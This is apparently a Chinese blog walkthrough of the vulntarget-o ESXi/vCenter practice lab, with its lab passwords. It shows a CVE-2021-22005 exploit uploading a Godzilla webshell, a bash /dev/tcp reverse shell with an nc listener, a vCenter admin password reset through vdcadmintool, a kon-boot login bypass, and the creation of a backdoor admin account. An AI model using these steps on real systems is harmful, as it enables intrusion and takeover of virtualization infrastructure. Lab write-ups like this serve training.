Skip to main content

vmware-esxi-vscenter-靶场vulntarget-o

·219 words·2 mins
IIIIIIIIIIII
Author
IIIIIIIIIIII
A little bit about you

vmware-esxi-vscenter-靶场vulntarget-o
#

https://pan.baidu.com/s/1sv9qdioNF4PTUliix5HEfg提取码: 2dwq 下载靶场

WP 靶机WP

奇安信攻防社区-记一次攻防演练之vcenter后渗透利用

安装配置
#

ESXi 是 VMware 的裸金属虚拟化 hypervisor(直接安装在物理服务器硬件上),核心功能是创建、运行和管理虚拟机;vCenter Server 是集中管理平台,用于统一管控多台 ESXi 主机及上面的所有虚拟机,实现规模化运维。 这个靶机相当于在一个主机里面创建了两个虚拟机 攻击他的vxcenter相当于拿到了堡垒机进行跳板

就和阿里云的面板相似

设置为NAT模式 设置网段为10

打开配置

1

启动虚拟机

相关密码

esxi :192.168.10.128 进入后启动PC vcenter和win7

● 账号:root

● 密码:Vulntarget@123

vcenter:192.168.10.129

● 账号:administrator@vsphere.local

● 密码:Admin@vulntarget123

Windows7:192.168.10.*(dhcp)

● 账号:vulntarget

● 密码:Vulntarget

https://192.168.10.129/访问后启动客户端

渗透测试
#

这种面板就和阿里的一样点击画面就进去了可以操作

1

发现了vcenter客户端

1

cve-2021-22005
#

使用cve-2021-22005-exp-main
来一个哥斯拉后门
python exp.py -s 11.jsp -t https://192.168.10.129/
[*] target: https://192.168.10.129
[*] webshell: 11.jsp
[*] creating agent
[*] uploading manifest
[!] webshell url: https://192.168.10.129/idm/..;/tgpz9j.jsp
自动生成payload哥斯拉连接
webshell是没有交互的 反弹个shell来

bash -i >& /dev/tcp/192.168.10.1/6666 0>&1 反弹SHELL

nc -lvvp 6666
listening on [any] 6666 ...
192.168.10.129: inverse host lookup failed: h_errno 11004: NO_DATA
connect to [192.168.10.1] from (UNKNOWN) [192.168.10.129] 35096: NO_DATA
bash: cannot set terminal process group (1747): Inappropriate ioctl for device
bash: no job control in this shell
whoami
root

重置vcenter密码 这个不推荐 可以看上面那个社区其他攻击方法

/usr/lib/vmware-vmdir/bin/vdcadmintool 重置密码

  Please enter account UPN : administrator@vsphere.local


==================
Please select:
0. exit
1. Test LDAP connectivity
2. Force start replication cycle
3. Reset account password
4. Set log level and mask
5. Set vmdir state
6. Get vmdir state
7. Get vmdir log level and mask
==================


New password is -
qx[cKy5r@0-OP+p{Xw'@   拿到密码登录

1

进入VCENTER
#

进入后我们要拿下这个win7可以上传恶意的iso镜像来达成-使用克隆虚拟机

VMware vSphere Client 环境下克隆的虚拟机不需要本机启动就能启动,是因为虚拟机本身具备相对独立性

先上传到数据库中 kon-bootCD.iso

1

再克隆

1

选中自定义

1

选中镜像 去掉网络避免冲突

1

1

强制进入bios

1

启动之后,在bios界面,使用+-符号来移动顺序,mac上只能用-来移动,将cd作为第一个,然后f10保存即可

1

进入登录界面按5下shift

默认system权限

  net user admin33 admin33 /add  账号admin33 密码admin33
  net localgroup administrators admin33 /add 将新创建的用户 admin33 添加到 管理员组(administrators)

1

1

Related

poppips-mazasec
·1025 words·5 mins
Editor-htb
·260 words·2 mins
fluffy-htb
·930 words·5 mins
K8s-3-靶场渗透
·218 words·2 mins
K8s-2-未授权访问-proxy
·931 words·5 mins